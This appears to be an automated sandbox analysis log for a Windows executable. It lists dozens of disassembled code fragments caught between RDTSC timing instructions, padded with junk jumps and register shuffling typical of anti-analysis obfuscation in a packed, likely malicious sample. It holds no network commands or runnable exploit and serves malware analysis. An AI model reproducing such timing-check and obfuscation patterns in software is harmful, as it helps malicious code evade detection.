Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71411FF second address: 7141247 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 2CC3686Ah 0x00000008 call 00007FD13D06371Bh 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [edx+14h], eax 0x00000014 pushad 0x00000015 pushad 0x00000016 movsx edx, ax 0x00000019 call 00007FD13D063728h 0x0000001e pop esi 0x0000001f popad 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+18h] 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov ax, F759h 0x0000002b mov dx, cx 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141247 second address: 714124C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714124C second address: 7141285 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+18h], eax 0x0000000c jmp 00007FD13D063723h 0x00000011 mov eax, dword ptr [esi+1Ch] 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FD13D063725h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141285 second address: 71412EF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [edx+1Ch], eax 0x0000000c pushad 0x0000000d pushad 0x0000000e jmp 00007FD13CB4AEFAh 0x00000013 popad 0x00000014 pushfd 0x00000015 jmp 00007FD13CB4AEFEh 0x0000001a jmp 00007FD13CB4AF05h 0x0000001f popfd 0x00000020 popad 0x00000021 mov eax, dword ptr [esi+20h] 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FD13CB4AF08h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71412EF second address: 71412F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71412F3 second address: 71412F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71412F9 second address: 71413D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 movzx ecx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [edx+20h], eax 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FD13D06371Bh 0x00000015 xor si, 5EAEh 0x0000001a jmp 00007FD13D063729h 0x0000001f popfd 0x00000020 jmp 00007FD13D063720h 0x00000025 popad 0x00000026 mov eax, dword ptr [esi+24h] 0x00000029 pushad 0x0000002a pushfd 0x0000002b jmp 00007FD13D06371Eh 0x00000030 adc ax, 1B58h 0x00000035 jmp 00007FD13D06371Bh 0x0000003a popfd 0x0000003b pushfd 0x0000003c jmp 00007FD13D063728h 0x00000041 sub si, 25B8h 0x00000046 jmp 00007FD13D06371Bh 0x0000004b popfd 0x0000004c popad 0x0000004d mov dword ptr [edx+24h], eax 0x00000050 jmp 00007FD13D063726h 0x00000055 mov eax, dword ptr [esi+28h] 0x00000058 jmp 00007FD13D063720h 0x0000005d mov dword ptr [edx+28h], eax 0x00000060 push eax 0x00000061 push edx 0x00000062 push eax 0x00000063 push edx 0x00000064 jmp 00007FD13D06371Ah 0x00000069 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71413D0 second address: 71413DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71413DF second address: 714149D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [esi+2Ch] 0x0000000c jmp 00007FD13D06371Eh 0x00000011 mov dword ptr [edx+2Ch], ecx 0x00000014 jmp 00007FD13D063720h 0x00000019 mov ax, word ptr [esi+30h] 0x0000001d pushad 0x0000001e jmp 00007FD13D06371Eh 0x00000023 pushfd 0x00000024 jmp 00007FD13D063722h 0x00000029 sbb ecx, 35E5A998h 0x0000002f jmp 00007FD13D06371Bh 0x00000034 popfd 0x00000035 popad 0x00000036 mov word ptr [edx+30h], ax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FD13D06371Bh 0x00000043 xor si, 3A5Eh 0x00000048 jmp 00007FD13D063729h 0x0000004d popfd 0x0000004e call 00007FD13D063720h 0x00000053 pop ecx 0x00000054 popad 0x00000055 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714149D second address: 71414A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71414A3 second address: 71414A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71414A7 second address: 71414C1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ax, word ptr [esi+32h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71414C1 second address: 71414C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71414C5 second address: 71414E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71414E2 second address: 71415AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e mov cx, 6A73h 0x00000012 push eax 0x00000013 jmp 00007FD13D06371Fh 0x00000018 pop esi 0x00000019 popad 0x0000001a mov eax, dword ptr [esi+34h] 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007FD13D063725h 0x00000024 sub ax, 9F66h 0x00000029 jmp 00007FD13D063721h 0x0000002e popfd 0x0000002f pushfd 0x00000030 jmp 00007FD13D063720h 0x00000035 jmp 00007FD13D063725h 0x0000003a popfd 0x0000003b popad 0x0000003c mov dword ptr [edx+34h], eax 0x0000003f jmp 00007FD13D06371Eh 0x00000044 test ecx, 00000700h 0x0000004a pushad 0x0000004b movzx eax, dx 0x0000004e push ebx 0x0000004f jmp 00007FD13D063726h 0x00000054 pop eax 0x00000055 popad 0x00000056 jne 00007FD1AAD2188Eh 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 push eax 0x00000061 push edx 0x00000062 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71415AB second address: 71415AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71415AF second address: 71415C9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063726h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71415C9 second address: 71415F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13CB4AF01h 0x00000009 xor ecx, 7A3FD396h 0x0000000f jmp 00007FD13CB4AF01h 0x00000014 popfd 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71415F8 second address: 7141625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 or dword ptr [edx+38h], FFFFFFFFh 0x0000000b pushad 0x0000000c mov ah, 9Ch 0x0000000e push edx 0x0000000f mov ecx, 311F7D91h 0x00000014 pop ecx 0x00000015 popad 0x00000016 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FD13D06371Fh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141625 second address: 7141642 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141642 second address: 714169E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, D7h 0x00000005 call 00007FD13D063728h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e or dword ptr [edx+40h], FFFFFFFFh 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 movzx ecx, bx 0x00000018 pushfd 0x00000019 jmp 00007FD13D06371Fh 0x0000001e or esi, 60C214EEh 0x00000024 jmp 00007FD13D063729h 0x00000029 popfd 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 714169E second address: 71416D0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD13CB4AF08h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71416D0 second address: 71416DF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71416DF second address: 71416E5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71416E5 second address: 7141722 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD13D06371Dh 0x00000010 and ch, FFFFFFE6h 0x00000013 jmp 00007FD13D063721h 0x00000018 popfd 0x00000019 push eax 0x0000001a push edx 0x0000001b jmp 00007FD13D06371Eh 0x00000020 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7141722 second address: 7141744 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 leave 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD13CB4AF08h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190ACB second address: 7190AD1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190AD1 second address: 7190B1C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a call 00007FD13CB4AEFCh 0x0000000f mov ah, 64h 0x00000011 pop ebx 0x00000012 popad 0x00000013 xchg eax, ebp 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushfd 0x00000018 jmp 00007FD13CB4AF02h 0x0000001d jmp 00007FD13CB4AF05h 0x00000022 popfd 0x00000023 mov dx, cx 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7190B1C second address: 7190B38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D063728h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7130981 second address: 7130990 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AEFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7130990 second address: 71309E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063729h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD13D063723h 0x00000013 sub si, F8BEh 0x00000018 jmp 00007FD13D063729h 0x0000001d popfd 0x0000001e mov cx, CE07h 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71309E9 second address: 7130A05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AF08h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D0041 second address: 70D0053 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13D06371Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D0053 second address: 70D0101 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD13CB4AEFDh 0x00000010 sbb cl, 00000076h 0x00000013 jmp 00007FD13CB4AF01h 0x00000018 popfd 0x00000019 call 00007FD13CB4AF00h 0x0000001e pushfd 0x0000001f jmp 00007FD13CB4AF02h 0x00000024 sbb ch, FFFFFFC8h 0x00000027 jmp 00007FD13CB4AEFBh 0x0000002c popfd 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov ebp, esp 0x00000031 jmp 00007FD13CB4AEFFh 0x00000036 pop ebp 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a push ebx 0x0000003b pop ecx 0x0000003c pushfd 0x0000003d jmp 00007FD13CB4AF07h 0x00000042 or cl, 0000006Eh 0x00000045 jmp 00007FD13CB4AF09h 0x0000004a popfd 0x0000004b popad 0x0000004c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D0667 second address: 70D06D4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD13D063727h 0x00000009 or cx, 96AEh 0x0000000e jmp 00007FD13D063729h 0x00000013 popfd 0x00000014 call 00007FD13D063720h 0x00000019 pop esi 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e pushad 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007FD13D06371Ah 0x00000026 xor al, 00000058h 0x00000029 jmp 00007FD13D06371Bh 0x0000002e popfd 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D06D4 second address: 70D06F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 mov edx, esi 0x00000007 popad 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD13CB4AF00h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D06F7 second address: 70D06FD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 70D0B89 second address: 70D0B9B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD13CB4AEFEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 712095A second address: 71209C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063720h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FD13D06371Eh 0x00000013 sbb si, 2378h 0x00000018 jmp 00007FD13D06371Bh 0x0000001d popfd 0x0000001e jmp 00007FD13D063728h 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 jmp 00007FD13D063720h 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f movsx edx, ax 0x00000032 mov dx, si 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71209C8 second address: 71209CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71209CE second address: 71209D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100060 second address: 7100066 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100066 second address: 71000F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushad 0x0000000b jmp 00007FD13D063725h 0x00000010 mov ah, A6h 0x00000012 popad 0x00000013 push edi 0x00000014 movzx eax, di 0x00000017 pop edi 0x00000018 popad 0x00000019 mov ebp, esp 0x0000001b pushad 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD13D06371Ch 0x00000023 xor ecx, 405B3598h 0x00000029 jmp 00007FD13D06371Bh 0x0000002e popfd 0x0000002f mov ecx, 0002CF4Fh 0x00000034 popad 0x00000035 mov dh, ah 0x00000037 popad 0x00000038 and esp, FFFFFFF0h 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e pushfd 0x0000003f jmp 00007FD13D063723h 0x00000044 xor eax, 3293E30Eh 0x0000004a jmp 00007FD13D063729h 0x0000004f popfd 0x00000050 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71000F5 second address: 7100128 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 7BFA0817h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov cl, 0Eh 0x0000000b popad 0x0000000c sub esp, 44h 0x0000000f jmp 00007FD13CB4AEFFh 0x00000014 xchg eax, ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FD13CB4AF00h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100128 second address: 7100137 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100137 second address: 7100176 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD13CB4AF01h 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD13CB4AEFDh 0x00000017 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100176 second address: 71001A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop esi 0x0000000f jmp 00007FD13D06371Fh 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71001A1 second address: 71001A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71001A6 second address: 71001FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, CEh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007FD13D063727h 0x0000000f xchg eax, esi 0x00000010 pushad 0x00000011 mov di, cx 0x00000014 jmp 00007FD13D063720h 0x00000019 popad 0x0000001a xchg eax, edi 0x0000001b jmp 00007FD13D063720h 0x00000020 push eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FD13D06371Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71001FF second address: 7100204 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100204 second address: 710024D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx edi, cx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, edi 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push ebx 0x0000000f pop ecx 0x00000010 pushfd 0x00000011 jmp 00007FD13D063727h 0x00000016 and esi, 06D5CC1Eh 0x0000001c jmp 00007FD13D063729h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 710024D second address: 7100274 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edi, dword ptr [ebp+08h] 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD13CB4AEFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7100274 second address: 71002D2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D063721h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+24h], 00000000h 0x00000011 jmp 00007FD13D06371Eh 0x00000016 lock bts dword ptr [edi], 00000000h 0x0000001b jmp 00007FD13D063720h 0x00000020 jc 00007FD1ACE35895h 0x00000026 pushad 0x00000027 mov edi, ecx 0x00000029 call 00007FD13D06371Ah 0x0000002e mov edx, eax 0x00000030 pop esi 0x00000031 popad 0x00000032 pop edi 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 pushad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71002D2 second address: 71002D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71002D6 second address: 71002DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71002DC second address: 71002E2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71002E2 second address: 71002E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71002E6 second address: 7100303 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD13CB4AF02h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7120889 second address: 712088D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 712088D second address: 7120906 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007FD13CB4AF02h 0x0000000f jmp 00007FD13CB4AF02h 0x00000014 popad 0x00000015 mov ch, A9h 0x00000017 popad 0x00000018 xchg eax, ebp 0x00000019 pushad 0x0000001a mov eax, edi 0x0000001c call 00007FD13CB4AEFFh 0x00000021 pushfd 0x00000022 jmp 00007FD13CB4AF08h 0x00000027 or ah, FFFFFFC8h 0x0000002a jmp 00007FD13CB4AEFBh 0x0000002f popfd 0x00000030 pop ecx 0x00000031 popad 0x00000032 mov ebp, esp 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 push eax 0x00000038 pop ebx 0x00000039 mov edi, eax 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7130C87 second address: 7130C96 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13D06371Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 7130D8B second address: 7130DA8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A06AC second address: 71A06B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\BkB1ur7aFW.exeRDTSC instruction interceptor: First address: 71A06B2 second address: 71A0737 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD13CB4AF03h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e mov cl, 71h 0x00000010 pushfd 0x00000011 jmp 00007FD13CB4AF01h 0x00000016 sbb ah, FFFFFFC6h 0x00000019 jmp 00007FD13CB4AF01h 0x0000001e popfd 0x0000001f popad 0x00000020 mov dl, byte ptr [ebp+14h] 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007FD13CB4AF03h 0x0000002c and eax, 1D70A6FEh 0x00000032 jmp 00007FD13CB4AF09h 0x00000037 popfd 0x00000038 mov si, 3747h 0x0000003c popad 0x0000003d rdtsc
